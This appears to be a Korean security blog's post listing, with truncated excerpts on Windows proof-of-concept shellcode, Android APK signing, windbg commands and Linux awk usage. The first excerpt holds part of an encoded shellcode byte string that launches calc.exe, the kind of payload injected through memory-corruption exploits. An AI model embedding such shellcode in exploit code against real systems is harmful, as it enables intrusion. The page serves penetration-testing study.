All
-
Windows PoC codePentesting/Windows 2019. 2. 13. 10:18
윈도우 calc.exe 쉘코드 shellcode = ( "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" "\xd7\x94\x6e..
-
안드로이드 모바일 APK SigningPentesting/Android 2019. 2. 13. 10:06
Keystore 생성 keytool.exe -genkey -v -keystore Scent2d.keystore -alias Scent2d -keyalg RSA -keysize 1024 -sigalg SHA1withRSA -validity 10000 Signing 진행 jarsigner.exe -keystore Scent2d.keystore [Appname.apk] -sigalg SHA1withRSA -digestalg SHA1 Scent2d
-
windbg 명령어 정리Pentesting/Windows 2019. 2. 13. 10:00
1. [windbg] 32-bit or 64-bit 디버깅 변경 명령어- !wow64exts.sw 2. [windbg] 심볼 추가 값- SRV*C:\windbgsymbols*http://msdl.microsoft.com/download/symbols- .reload 3. [windbg] 심볼 확인- x *!- x kernel32!virtual*- x *!messagebox* 4. [windbg] 도움말 보기- .hh- .hh 5. [windbg] 사용 중인 모듈 보기- lmf- lmf m ntdll- !dh ntdll // 모듈 이미지 헤더 값 출력 6. [windbg] 여러 포멧으로 값을 출력- .formats 1234 7. [windbg] 연산 필요할 땐 '?' 사용- ? eax+4 8. [windb..
-
리눅스 명령어 정리 (3)Pentesting/Linux 2019. 2. 13. 09:51
▷ awk :awk프로그램은 입력으로부터 한 줄씩을 읽어서 정규표현식으로 조건이 맞는지를 검사하고 참으로판명되면 그 줄에 대해 명령어를 실행하는 형식[문법]: awk '표현식 {액션}' 파일 , awk -f [awk 명령 스크립트 파일] 파일 >ls -l " awk '{print NR, $0}' - 구분자를 지정하는 옵션은 -F (예를들어 /etc/passwd 파일의 경우 지정자를 콜론(:) 사용) - /etc/passwd 파일을 awk 명령어의 -F 옵션을 이용해 콜론(:)으로 필드를 구분하고 문자열이 user로 시작하는 행의 첫번째($1), 여섯 번째 필드($6)를 표시하라는 스크립트>cat /etc/passwd | awk -F: '/^user/{print $1,$6}' [정규표현식]^ 라인의 처음$..